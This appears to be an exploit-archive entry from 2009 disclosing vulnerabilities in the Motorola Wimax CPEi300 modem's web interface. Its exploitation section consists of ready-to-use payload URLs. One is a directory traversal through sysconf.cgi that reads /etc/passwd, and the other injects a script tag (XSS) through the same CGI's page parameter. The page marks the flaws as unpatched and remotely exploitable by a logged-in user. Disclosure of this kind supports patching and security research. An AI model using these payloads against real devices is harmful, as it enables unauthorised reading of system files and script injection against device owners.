Motorola Wimax modem CPEi300 (FD/XSS) Multiple Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Motorola Wimax modem CPEi300 (FD/XSS) Multiple Vulnerabilities
# Published : 2009-01-29
# Author : Usman Saeed
# Previous Title : WFTPD Explorer Pro 1.0 Remote Heap Overflow Exploit
# Next Title : ManageEngine Firewall Analyzer 5 XSRF/XSS Vulnerability

#####################################################################################
#
#   Name    :   Motorola Wimax modem CPEi300 Multiple Vulnerabilities
#   Author  :   Usman Saeed 
#   Company :   Xc0re Security Reasearch Group
#   Homepage :  http://www.xc0re.net
#
#####################################################################################


[Note: User needs to logged in! ]

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Exploitation : 

   [+] Directory traversal
	http://Hostname/cgi-bin/sysconf.cgi?page=../../../etc/passwd&action=request&sid=AeoFSFoI4lDs 

   [+] XSS 

	http://Hostname/cgi-bin/sysconf.cgi?page="><script>alert(1);</script>"&action=request&sid=AeoFSFoI4lDs  


# www.Syue.com [2009-01-29]